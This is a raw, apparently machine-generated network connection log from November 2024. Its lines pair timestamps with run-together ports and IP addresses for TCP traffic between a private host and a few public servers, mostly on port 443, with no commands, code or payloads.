                                                                                                                                                                                                Nov 24, 2024 03:04:47.591346979 CET4434974923.218.208.109192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:47.651689053 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:47.687242031 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:47.690815926 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:47.690840960 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:47.755417109 CET49753443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:47.755470991 CET4434975313.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:47.755633116 CET49753443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:47.756051064 CET49753443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:47.756064892 CET4434975313.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:47.921847105 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:47.926189899 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:47.926224947 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:47.957525015 CET4434974923.218.208.109192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:47.957607031 CET4434974923.218.208.109192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:47.957700014 CET49749443192.168.2.523.218.208.109
                                                                                                                                                                                                Nov 24, 2024 03:04:47.958918095 CET49749443192.168.2.523.218.208.109
                                                                                                                                                                                                Nov 24, 2024 03:04:47.958935976 CET4434974923.218.208.109192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:47.985579967 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:48.011388063 CET49754443192.168.2.523.218.208.109
                                                                                                                                                                                                Nov 24, 2024 03:04:48.011419058 CET4434975423.218.208.109192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:48.011681080 CET49754443192.168.2.523.218.208.109
                                                                                                                                                                                                Nov 24, 2024 03:04:48.012310028 CET49754443192.168.2.523.218.208.109
                                                                                                                                                                                                Nov 24, 2024 03:04:48.012326002 CET4434975423.218.208.109192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:48.113797903 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:48.113987923 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:48.114006996 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:48.118421078 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:48.118429899 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:48.119859934 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:48.119865894 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:48.121455908 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:48.121460915 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:48.182163000 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:48.195043087 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:48.195077896 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:48.239109993 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:48.239168882 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:48.239305973 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:48.239604950 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:48.239620924 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:48.349904060 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:48.352865934 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:48.352888107 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:48.541657925 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:48.551466942 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:48.551528931 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:48.597273111 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:48.713030100 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:48.713112116 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:48.713129044 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:48.719373941 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:48.719433069 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:48.721438885 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:48.721486092 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:48.722673893 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:48.722714901 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:48.743392944 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:48.754575014 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:48.795373917 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:48.905313015 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:48.908484936 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:48.908550978 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.097117901 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.099927902 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:49.099986076 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.196513891 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.288995981 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.289041996 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:49.289057970 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.306467056 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:49.306523085 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.315617085 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:49.315680027 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.316843987 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:49.316883087 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.388289928 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.395210028 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:49.395262957 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.456464052 CET4434975423.218.208.109192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.456547022 CET49754443192.168.2.523.218.208.109
                                                                                                                                                                                                Nov 24, 2024 03:04:49.480936050 CET49754443192.168.2.523.218.208.109
                                                                                                                                                                                                Nov 24, 2024 03:04:49.480952978 CET4434975423.218.208.109192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.482048035 CET4434975423.218.208.109192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.483196020 CET49754443192.168.2.523.218.208.109
                                                                                                                                                                                                Nov 24, 2024 03:04:49.521815062 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.523365974 CET4434975423.218.208.109192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.542921066 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:49.542972088 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.548736095 CET4434975313.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.549145937 CET49753443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:49.549192905 CET4434975313.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.550246000 CET4434975313.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.550323009 CET49753443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:49.551266909 CET49753443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:49.551335096 CET4434975313.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.551665068 CET49753443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:49.551671982 CET4434975313.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.599955082 CET49753443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:49.713852882 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.720062971 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:49.720136881 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.743999004 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.813453913 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:49.813462973 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.820187092 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:49.857213020 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.861855030 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:49.862709999 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:49.862732887 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.935977936 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.940769911 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:49.978950024 CET4434975423.218.208.109192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.979135036 CET4434975423.218.208.109192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.979396105 CET49754443192.168.2.523.218.208.109
                                                                                                                                                                                                Nov 24, 2024 03:04:49.979933023 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.980098963 CET49754443192.168.2.523.218.208.109
                                                                                                                                                                                                Nov 24, 2024 03:04:49.980112076 CET4434975423.218.208.109192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.980120897 CET49754443192.168.2.523.218.208.109
                                                                                                                                                                                                Nov 24, 2024 03:04:49.980132103 CET4434975423.218.208.109192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.980165958 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:49.980191946 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.981849909 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.981920958 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:49.983103037 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:49.983191013 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.983303070 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:49.983310938 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:49.983344078 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.027802944 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.040932894 CET4434975313.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.040973902 CET4434975313.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.040983915 CET4434975313.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.041001081 CET4434975313.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.041029930 CET4434975313.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.041035891 CET49753443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.041064024 CET4434975313.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.041079044 CET49753443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.041125059 CET49753443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.089620113 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.092863083 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.092899084 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.230797052 CET4434975313.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.230837107 CET4434975313.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.230901003 CET49753443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.230925083 CET4434975313.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.231178999 CET49753443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.238219976 CET4434975313.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.278089046 CET49753443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.283390999 CET4434975313.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.283416986 CET4434975313.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.283442974 CET4434975313.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.283468008 CET49753443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.283482075 CET4434975313.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.283513069 CET49753443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.283541918 CET49753443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.320112944 CET4434975313.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.320173025 CET49753443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.320189953 CET4434975313.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.320205927 CET4434975313.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.320250034 CET49753443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.320652962 CET49753443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.320667982 CET4434975313.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.321491957 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.325323105 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.325378895 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.325397968 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.329987049 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.329993010 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.331094027 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.331099987 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.440656900 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.443938971 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.443959951 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.443988085 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.443994045 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.471936941 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.471967936 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.471993923 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.472006083 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.472018957 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.472023964 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.472043991 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.472074986 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.472101927 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.475698948 CET49757443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.475722075 CET4434975713.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.475786924 CET49757443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.476022005 CET49757443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.476032972 CET4434975713.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.517210960 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.522339106 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.522358894 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.654555082 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.654603004 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.654640913 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.654659986 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.654675961 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.656131983 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.703901052 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.703947067 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.703974962 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.703995943 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.704011917 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.704129934 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.750282049 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.759069920 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.759088039 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.764173985 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.827696085 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.827704906 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.831401110 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.831427097 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.831476927 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.831516981 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.831553936 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.831629038 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.832304001 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.859235048 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.859256983 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.859308958 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.859328032 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.859380960 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.875339985 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.880155087 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.880176067 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.880225897 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.880239010 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.880276918 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.880289078 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.880527973 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.884088039 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.884103060 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.884160995 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.884166002 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.900415897 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.900438070 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.900640011 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.900651932 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.900701046 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.942286015 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:50.945231915 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:50.945247889 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:51.011049032 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:51.011071920 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:51.011109114 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:51.011121035 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:51.011147022 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:51.011166096 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:51.028184891 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:51.028217077 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:51.028254032 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:51.028264046 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:51.028295994 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:51.028310061 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:51.041743994 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:51.041764975 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:51.041805983 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:51.041842937 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:51.041862011 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:51.041932106 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:51.056968927 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:51.056989908 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:51.057034969 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:51.057069063 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:51.057095051 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:51.057115078 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:51.067279100 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:51.067322016 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:51.067354918 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:51.067369938 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:51.067398071 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:51.067409039 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:51.075351000 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:51.075388908 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:51.075414896 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:51.075423956 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:51.075450897 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:51.075454950 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:51.075609922 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:51.078902960 CET49755443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:51.078922987 CET4434975513.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:51.134464979 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:51.138638973 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:51.138674974 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:51.257927895 CET49760443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:51.257966042 CET4434976013.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:51.262037992 CET49760443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:51.262236118 CET49760443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:51.262254000 CET4434976013.107.246.63192.168.2.5
